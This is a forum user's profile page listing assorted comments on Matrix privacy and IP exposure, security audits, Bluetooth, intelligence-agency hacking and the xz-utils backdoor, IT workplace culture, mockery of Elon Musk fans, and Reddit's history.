0 Posts · 124 Comments · Joined 11 months ago · Cake day: July 30th, 2023
  • Just something to keep in mind for those not in the security space. When a security company does an audit, it’s generally a checklist of commercial and custom security software along with a couple of people poking around looking for more manual, harder-to-find stuff. But there’s a reason companies like Mullvad have a bug bounty program… Just because cure53 didn’t find it, it doesn’t mean some bored hacker won’t…

    Absolutely better than nothing though.

  • Then maybe you’re okay.

    A number of people can see your IP; people will chime in and add to and remove from this list:

    Can’t see it:

    • Random people you personal message with
    • Random people you chat with in rooms

    CAN see it:

    • Server admins
    • People you share (send/rcv files with) // this may have been fixed
    • People who send you links and you click them, but this isn’t specific to Matrix, it’s a tale as old as time.
    • You voice call with someone (may have been fixed)

    Some info may be wrong. But having someone’s IP in the days of routers and all filtered ports means little, unless you piss off someone who knows some low level customer support person @ your ISP to pay to get your account info. Or you’re dealing drugs in which case use TAILS and stop fucking with technologies you don’t know the specifics of.

    If they knock you offline and you can’t access anything at all, unplug your router AND MODEM (most importantly your modem) for an hour. Go touch grass for an hour. Whittle a wee branch. Plug your boxes back in and you’ll be bright as new.

    @possiblylinux127@lemmy.zip this isn’t meant to be a dig at you, although last time you didn’t care to correct or learn if I recall, but often times you leave out the “if so,” “possibly, what and XYZ?” and it ends up spreading misinformation because you didn’t know enough or care enough to type enough.

    I love Matrix but we need to be open about what the fish is before skinning it…

    https://gist.github.com/maxidorius/5736fd09c9194b7a6dc03b6b8d7220d0

    https://blog.erethon.com/blog/2022/07/13/what-a-malicious-matrix-homeserver-admin-can-do/

    https://www.reddit.com/r/PrivacyGuides/comments/q7qsty/is_matrix_still_a_metadata_disaster/

  • That does go a long way towards explaining why there are so many Bluetooth vulnerabilities, thanks for the info. Looking at the list of Bluetooth protocols wiki page gives me a headache. Surely there is a better standard, and I see things like HaLow, ZigBee, Z-Wave and other custom protocols, but it seems like there should be a very clean, well-documented alternative to do the basics that everyone expects BT to do. This, coming from a total noob, speaking completely out of my anus. I just know that as a BT user, it’s a crapshoot whether there will be major audio delay, and whether pause/play actually works, that’s if pairing works in the first place. But if something did come along I wonder if there would even be adoption among consumer devices.

  • Synnr@sopuli.xyz to Linux@lemmy.ml, *Permanently Deleted*, 1 month ago (edited)

    And have eyes good enough to look very closely and detect any small . or `s that are out of place, and be current on all methods of sanitization, catching any and all confusing variable names doing funny things, and never getting mentally overloaded doing it.

    I wouldn’t be surprised at all if teams at NSA & co had game months where the teams that find the highest number of vulns or develop the most damaging 0day exploits get a prize and challenge coin. Then you have the teams that develop the malware made to stay stealthy and intercept data for decades undetected, and the teams that play mail agent and intercept packages containing core internet backbone routers to put hardware ‘implants’ inside them.

    These are the things Snowden showed us a small sliver of in 2013, over a decade ago, some of which was well aged by that point.

    The days of doing illegal things for funsies on the internet, like learning how to hack hands-on, are over if you don’t want to really risk prison time. Download vulnerable virtual machines and hack on those.

    But if you’re worried about a random maintainer or packager inserting something like a password stealer or backdoor and letting it hit a major distro with a disastrous backdoor that doesn’t require a PhD in quantum fuckography to understand, chances are likely big brother would alert someone to blow the whistle before it hit production, as they likely did with xzutils.

  • Some of them, sure. Usually old people that ran out of neuroplasticity 40 years ago. But there are a lot more that function well enough and IT guys (specifically the guys, IT gals usually either have a better idea or hide it better) have a tendency to think of them as useless, where if they had to do their job for a day they’d be as lost as an old guy spooked by the window location change.

  • Synnr@sopuli.xyz to Technology@beehaw.org, 3 days 🤯, 3 months ago

    Yeah but he’s just a temporarily inconvenienced billionaire, the rest of these welfare queens are out here collecting rent and sitting around all day. They don’t need the money like he does. As soon as he gets a job, he’ll hustle that first billion in no time.


  • Synnr@sopuli.xyz to Technology@beehaw.org, 3 days 🤯, 3 months ago (edited)

    His YouTube shorts (500/day goal) are videos of Elon Musk saying things, with the background music alternating between the sigma male tune and the movie clip tune.

    Did you see how ELON MUSK OWNED💯 DON LEMON by getting flustered at the question of “half your advertisers have left the platform, if X fails, isn’t that on you?” so he told Don he should choose his words carefully because the interview clock only had 5 minutes left? And then Don was OWNED because he rephrased the question?

    LMAO. SUCK IT CNN. OWNED!


  • So many people in IT don’t understand this. I’m glad I did a lot of customer service while programming was still just a hobby.

    Developing the product or supporting the product dev team in some way (tech support, project managers, etc) is great, but if the company doesn’t have people to schmooze other people to give them money, your product doesn’t have much financial value.


  • Synnr@sopuli.xyz to ADHD memes@lemmy.dbzer0.com, A cruel irony, 3 months ago (edited)

    Lemmy is reddit 3.0. Early on, Reddit was basically only a website for tech nerds and misfits; atheism and jailbait were some of the most visited subreddits, idpol and divpol weren’t a make-or-break-your-family issue back then but there were still a ton of terminally online furries (yes if you’re a furry you’re weird, but weird is fine, let that freak flag fly.) I’m including myself in the group of outcasts and misfits, and my freak flag flies in weird ways too. I’ve been on Reddit since the default UI was like this, although it hadn’t changed much over the years before the redesign. Notice the quality of submissions though - it was a place for the intellectually curious.

    But you have a large subset of users who use pedantry and grammar-nazi-ism as a way to feel powerful when they’re powerless. It’s like picking on those lower than you, when you’re at the bottom of the pecking order.

    Those people saw Reddit go from their bastion of freedom to the corporate ad-haven it is today and all came here. You also have a lot of younger people who have time to kill and are just trying something new.